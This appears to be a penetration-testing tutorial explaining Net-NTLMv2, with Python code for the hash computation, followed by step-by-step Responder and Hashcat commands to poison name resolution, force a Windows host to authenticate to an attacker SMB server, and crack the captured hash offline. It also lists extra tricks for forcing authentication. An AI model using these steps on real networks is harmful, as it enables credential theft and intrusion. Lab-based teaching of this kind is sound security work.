Cracking Net-NTLMv2: Concepts & Responder

Published on June 25, 2025


What is Net-NTLMv2?

Net-NTLMv2 is Microsoft’s challenge–response authentication protocol used over networks (e.g., SMB, HTTP). Instead of sending a password, the client proves knowledge of its NTLM hash by computing an HMAC-MD5, keyed with a value derived from that hash, over a server-supplied nonce (challenge):

  1. Client requests access to a resource.
  2. Server responds with a random challenge (8 bytes).
  3. Client computes HMAC-MD5(challenge, NTLMv2_hash) + client nonce + timestamp.
  4. Client sends this “response” back.
  5. Server verifies by computing the same HMAC using the stored NTLM hash.

Because the challenge is random and the response includes a timestamp and client nonce, replay is more difficult than with NTLMv1—but capture-and-offline-crack remains trivial once you have the blob.
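To make steps 1 to 5 concrete, the following Python is an added example (not code from the original article) that implements the Net-NTLMv2 computation as MS-NLMP specifies it, on both the client and the server side, and formats the result in the user::domain:challenge:proof:blob layout that Responder prints and Hashcat mode 5600 reads. The NT hash, server challenge, client nonce, timestamp and empty target-info are constructed sample values; the point to notice is that the server check needs nothing but the stored NT hash, which is exactly why a captured blob can be checked against password guesses offline.

```python
import hashlib
import hmac
import struct

# Constructed sample inputs: a 16-byte NT hash (a real one is MD4 of the
# UTF-16LE password), an 8-byte server challenge, an 8-byte client nonce and
# a FILETIME timestamp. Target-info (AV_PAIRs) is left empty for brevity.
NT_HASH = bytes(range(16))
SERVER_CHALLENGE = bytes.fromhex("1122334455667788")
CLIENT_NONCE = bytes.fromhex("a1a2a3a4a5a6a7a8")
TIMESTAMP = 0x01DBE5C0_00000000  # FILETIME: 100 ns ticks since 1601-01-01
TARGET_INFO = b""

def ntowf_v2(nt_hash: bytes, user: str, domain: str) -> bytes:
    """NTOWFv2 (MS-NLMP 3.3.2): HMAC-MD5 keyed with the NT hash over
    UTF-16LE(UPPERCASE(user) + domain). This is the 'NTLMv2 hash'."""
    data = (user.upper() + domain).encode("utf-16-le")
    return hmac.new(nt_hash, data, hashlib.md5).digest()

def build_blob(timestamp: int, client_nonce: bytes, target_info: bytes) -> bytes:
    """The 'temp' structure sent after NTProofStr. It begins with 0x01010000,
    which is why captured lines show a field starting with 01010000."""
    return (b"\x01\x01" + b"\x00" * 6 + struct.pack("<Q", timestamp)
            + client_nonce + b"\x00" * 4 + target_info + b"\x00" * 4)

def nt_proof(nt_hash: bytes, user: str, domain: str,
             server_challenge: bytes, blob: bytes) -> bytes:
    """Client side (step 3): NTProofStr = HMAC-MD5(NTOWFv2, challenge || blob)."""
    key = ntowf_v2(nt_hash, user, domain)
    return hmac.new(key, server_challenge + blob, hashlib.md5).digest()

def server_verify(stored_nt_hash: bytes, user: str, domain: str,
                  server_challenge: bytes, proof: bytes, blob: bytes) -> bool:
    """Server side (step 5): recompute from the stored NT hash and compare.
    Only the NT hash is needed, so the same check works offline on a capture."""
    expected = nt_proof(stored_nt_hash, user, domain, server_challenge, blob)
    return hmac.compare_digest(expected, proof)

def responder_line(user: str, domain: str, server_challenge: bytes,
                   proof: bytes, blob: bytes) -> str:
    """user::domain:server_challenge:NTProofStr:blob, the layout Responder prints."""
    return f"{user}::{domain}:{server_challenge.hex()}:{proof.hex()}:{blob.hex()}"

def demo(user: str = "paul", domain: str = "FILES01"):
    """Run one full exchange; returns (server_accepted, captured_line)."""
    blob = build_blob(TIMESTAMP, CLIENT_NONCE, TARGET_INFO)
    proof = nt_proof(NT_HASH, user, domain, SERVER_CHALLENGE, blob)
    ok = server_verify(NT_HASH, user, domain, SERVER_CHALLENGE, proof, blob)
    return ok, responder_line(user, domain, SERVER_CHALLENGE, proof, blob)

if __name__ == "__main__":
    print(demo())
```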

Why Not Mimikatz?

Mimikatz reads cleartext and hashes from LSASS memory, but on many targets you’ll only have an unprivileged shell without Administrator or SeDebugPrivilege. Without SYSTEM rights, Mimikatz cannot access LSASS, so you must resort to network-level capture of Net-NTLMv2.

Introducing Responder

Responder is a network-poisoning tool that:

  • Implements rogue protocol servers (SMB, HTTP, FTP).
  • Poisons name resolution (LLMNR, NBT-NS, mDNS) to force clients to authenticate.
  • Captures Net-NTLMv2 challenge–response blobs for offline cracking.

We’ll focus on its built-in SMB server to capture Net-NTLMv2 from an unprivileged user.

Step-by-Step Capture & Crack

1. Identify Your Interface

kali@kali:~$ ip a

Explanation: Lists network interfaces and their IPs; note the one reachable by the target (e.g., tap0: 192.168.119.2/24).

2. Start Responder

kali@kali:~$ sudo responder -I tap0

Explanation: -I selects interface; Responder now serves SMB and poisons LLMNR/NBT-NS to capture hashes.

3. Force Authentication from Target

C:\> dir \\192.168.119.2\test

Explanation: UNC path lookup forces the Windows host to authenticate to our SMB server—even if share “test” doesn’t exist.

4. Observe Captured Blob

[SMB] NTLMv2-SSP Client   : ::ffff:192.168.50.211
[SMB] NTLMv2-SSP Username : FILES01\paul
[SMB] NTLMv2-SSP Hash     : paul::FILES01:…:01010000…:…

Explanation: Responder displays the full challenge–response string; copy it into paul.hash on Kali.

5. Save the Hash

kali@kali:~$ echo "paul::FILES01:…:01010000…:…" > paul.hash

Explanation: Stores the captured blob for cracking.

6. Identify Hashcat Mode

kali@kali:~$ hashcat --help | grep -i ntlmv2

Explanation: Returns 5600 | NetNTLMv2, the mode for Net-NTLMv2 blobs.

7. Crack with Hashcat

kali@kali:~$ hashcat -m 5600 paul.hash \
  /usr/share/wordlists/rockyou.txt --force

Explanation: -m 5600: NetNTLMv2 mode; rockyou.txt: wordlist; --force: ignore warnings (typically about the OpenCL runtime), which can hide real errors and lead to missed cracks, so use it only on a lab box.

Result reveals paul:123Password123.

8. Verify Credentials

mstsc /v:192.168.50.211

Explanation: Connect via RDP to confirm access; mstsc has no /u switch, so enter FILES01\paul and the cracked password at the credential prompt.

Alternate Forcing Methods

  • Web upload UNC: Submit a path like \\192.168.119.2\share\dummy.txt in file-upload forms to trigger authentication.
  • Print spooler abuse: Use net use or print /d:\\192.168.119.2\printer to force SMB auth.

Key Takeaways

  • Net-NTLMv2 is a challenge–response protocol using HMAC-MD5 keyed with a value derived from the client’s NTLM hash.
  • Unprivileged shells cannot use Mimikatz, so network capture via Responder is required.
  • Responder poisons name resolution and hosts rogue SMB to log authentication attempts.
  • Captured Net-NTLMv2 blobs can be cracked offline (Hashcat mode 5600) to recover plaintext.